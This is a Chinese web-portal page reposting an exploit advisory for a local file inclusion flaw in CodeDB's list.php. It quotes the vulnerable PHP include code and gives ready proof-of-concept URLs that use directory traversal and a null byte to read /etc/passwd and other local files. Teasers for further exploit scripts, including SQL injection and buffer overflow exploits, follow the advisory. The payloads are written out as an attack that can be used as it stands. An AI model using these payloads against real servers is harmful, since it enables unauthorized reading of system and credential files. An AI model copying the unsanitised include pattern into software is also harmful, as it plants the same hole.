首页
网页制作
网络编程
脚本专栏
数据库
网站运营
网络安全
平面设计
CMS教程
搜索
建站极客
网络安全
Exploit
正文
CodeDB (list.php lang) Local File Inclusion Vulnerability
所属分类:
网络安全
/
Exploit
阅读数: 144
收藏 0
赞 0
分享
###############################################################################
#
# Name : CodeDB (list.php lang) Local File Inclusion Vulnerability
# Author : cOndemned
# Greetz : ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;*
#
###############################################################################
Source :
// list.php
2. $lang = htmlspecialchars($_GET['lang']); // ok, but.... for what ? lol
7. if(file_exists('templates/'.$lang.'_middle.php')) // We'll have to cut off rest of filename & extension
8. include('templates/'.$lang.'_middle.php'); // Ekhm... pwned ;d
Proof of Concept :
http://[host]/[codeDB_path]/list.php?lang=../readme.txt\0
http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd\0
http://[host]/[codeDB_path]/list.php?lang=../[local_file]\0
EoF.
更多精彩内容
其他人还在看
Maian Events 2.0 Insecure Cookie Handling Vulnerability
Author: Saime Date: July 12, 2008 Script: Maian Events v2.0 Insecure Cookie Handling Vulnerability URL: http://www.maianscriptworld
评论 0
收藏 0
赞 0
分享
Maian Gallery 2.0 Insecure Cookie Handling Vulnerability
Author: Saime Date: July 12, 2008 Script: Maian Gallery v2.0 Insecure Cookie Handling Vulnerability URL: http://www.maianscriptworl
评论 0
收藏 0
赞 0
分享
Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability
################################################################# # # Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability
评论 0
收藏 0
赞 0
分享
Maian Cart 1.1 Insecure Cookie Handling Vulnerability
Author: Saime Date: July 12, 2008 Script: Maian Cart v1.1 Insecure Cookie Handling Vulnerability URL: http://www.maianscriptworld.c
评论 0
收藏 0
赞 0
分享
Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit
#!/usr/bin/perl # # http://www.securityfocus.com/bid/11775 # credit to Muts for this vulnerability # acaro [at] jervus.it
评论 0
收藏 0
赞 0
分享
phsBlog 0.2 Bypass SQL Injection Filtering Exploit
#!/usr/bin/perl #---------------------------------------------------------------- # #Script : PhsBlog v0.2 # #Type : Bypass S
评论 0
收藏 0
赞 0
分享
Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit
#!/usr/bin/perl #---------------------------------------------------------------- # #Script : Ezphotogallery 2.1 # #Type : Mu
评论 0
收藏 0
赞 0
分享
Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC
<!-- Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC Summary: Maxthon Browser is a powerful tabbed browser built
评论 0
收藏 0
赞 0
分享
minb 0.1.0 Remote Code Execution Exploit
#!/usr/bin/python ##################################################################################### #### minb
评论 0
收藏 0
赞 0
分享
Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit
<!-- Jeremy Brown (0xjbrown41@gmail.com/jbrownsec.blogspot.com) Adobe Acrobat 9 Remote DoS (--) Tested on AA9/IE7/Vista I
评论 0
收藏 0
赞 0
分享
查看更多
网络赚钱
更多
网赚之谈:做什么网站才能让我们草根站长有个出路
网赚之谈:如何用最少的钱做最大化的网站推广
让所谓“网络营销”的人哭笑不得:一个圈外人士的真实网赚经历
怎么才能做好移动互联网营销?
电脑系统下载类网站是怎么赚钱的?浅析电脑系统下载类网站的赚钱方式
一个既能省钱又能赚钱的公众号 你要错过么
站长故事
更多
小米、华为互喷的背后:互相吃翔的GDP!
站长故事之一份月薪1200元的SEO推广工作
作为站长的你是否已有危机感:你被盯上了
作为站长的我们到底需要什么?我们又缺少了什么
年轻站长的苦逼SEO路:虽难却依旧顽强的坚持着
做站7年
